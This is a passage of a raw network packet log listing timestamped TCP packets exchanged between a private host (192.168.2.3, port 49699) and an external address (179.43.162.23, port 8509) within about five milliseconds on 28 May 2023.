May 28, 2023 10:50:05.072909117 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072926044 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072928905 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072948933 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072963953 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.072968006 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.072988033 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073008060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073014021 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073034048 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073049068 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073057890 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073077917 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073097944 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073105097 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073117971 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073138952 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073138952 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073158026 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073174000 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073177099 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073196888 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073216915 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073220015 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073236942 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073254108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073256969 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073277950 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073295116 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073297977 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073319912 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073335886 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073339939 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073359013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073374033 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073376894 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073396921 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073414087 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073417902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073438883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073458910 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073462963 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073477983 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073497057 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073507071 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073515892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073535919 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073543072 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073555946 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073575974 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073582888 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073596001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073611975 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073616028 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073636055 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073648930 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073653936 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073673010 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073693037 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073700905 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073712111 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073734045 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073741913 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073753119 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073760033 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073772907 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073796034 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073811054 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073816061 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073836088 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073854923 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073858976 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073873997 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073893070 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073894978 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073910952 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073930025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073944092 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073950052 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073968887 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.073977947 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.073987961 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074002028 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074007988 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074028969 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074047089 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074049950 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074065924 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074084997 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074085951 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074105978 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074121952 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074125051 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074142933 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074158907 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074162960 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074182987 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074196100 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074202061 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074223995 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074238062 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074243069 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074263096 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074276924 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074285030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074304104 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074323893 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074342966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074347019 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074362993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074368000 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074383020 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074388981 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074400902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074419975 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074439049 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074440956 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074457884 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074476957 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074485064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074496984 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074516058 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074520111 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074536085 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074553967 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074556112 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074574947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074594021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074594975 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074613094 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074631929 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074640036 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074651003 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074667931 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074671030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074690104 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074708939 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074709892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074728966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074743986 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074748039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074767113 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074788094 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074791908 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074810982 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074831009 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074831009 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074851036 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074871063 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074878931 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074889898 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074908018 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074913979 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074927092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074934006 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074944973 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074964046 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.074980021 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.074984074 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075004101 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075021982 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075021982 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075043917 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075052977 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075062990 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075083017 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075097084 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075102091 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075120926 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075139999 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075159073 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075176954 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075181007 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075181007 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075198889 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075203896 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075218916 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075237989 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075257063 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075261116 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075275898 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075289011 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075303078 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075309038 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075329065 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075345039 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075356960 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075368881 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075378895 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075398922 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075409889 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075418949 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075438023 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075448036 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075457096 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075476885 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075495958 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075515032 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075531006 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075531006 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075535059 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075555086 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075573921 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075575113 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075594902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075615883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075624943 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075634956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075644970 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075654984 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075675011 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075691938 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075695992 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075716972 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075732946 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075737000 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075757027 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075766087 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075777054 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075798035 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075814009 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075815916 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075838089 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075856924 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075858116 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075877905 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075894117 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075896025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075923920 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075942993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075948954 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.075962067 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075980902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.075980902 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076003075 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076021910 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076023102 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076042891 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076061964 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076061964 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076081038 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076097965 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076100111 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076119900 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076136112 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076138973 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076159000 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076169968 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076178074 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076198101 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076215982 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076215982 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076236010 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076255083 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076273918 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076286077 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076304913 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076306105 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076323986 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076344967 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076356888 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076364994 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076381922 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076386929 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076409101 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076414108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076430082 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076450109 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076461077 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076469898 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076488972 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076497078 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076508999 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076529026 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076546907 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076549053 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076569080 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076587915 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076602936 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076602936 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076622963 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076642990 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076647997 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076662064 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076668024 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076682091 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076694965 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076704025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076724052 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076741934 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076744080 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076764107 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076778889 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076792002 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076813936 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076818943 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076844931 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076865911 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076885939 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076901913 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076906919 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076921940 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076929092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076950073 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076967001 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.076970100 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.076989889 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077003956 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077008963 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077029943 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077049017 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077058077 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077069998 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077075005 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077090025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077110052 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077128887 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077131033 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077151060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077167988 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077171087 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077191114 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077198029 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077210903 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077229977 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077239990 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077250004 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077270985 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077275991 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077291012 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077311039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077322960 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077330112 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077352047 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077366114 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077370882 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077385902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077400923 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.077415943 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.077419996 CEST	8509	49699	179.43.162.23	192.168.2.3
